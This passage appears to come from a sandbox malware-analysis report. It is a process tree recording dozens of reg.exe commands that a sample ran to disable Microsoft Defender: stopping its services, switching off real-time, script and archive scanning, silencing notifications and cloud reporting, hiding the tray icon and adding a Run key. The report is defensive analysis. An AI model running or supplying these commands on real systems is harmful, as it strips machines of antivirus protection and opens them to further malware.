    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies security service
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3436
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3508
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3528
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:2132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3576
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:3880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3604
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:3628
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:3884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:888
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:3960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:2784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:3972
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:3940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:2236
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:3952
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:3480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:2952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:3052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:3208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:916
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:3148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:2868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:3048
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:3136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:4056
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:3112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3184
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:2224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:3384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1340
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:3728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:2948
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:3548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:3284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:3040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:2276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3164
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:3780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:2284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:3440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:3628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2428
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:3652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:3800
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:3608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:3880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2504
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:3496
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\reg.exe
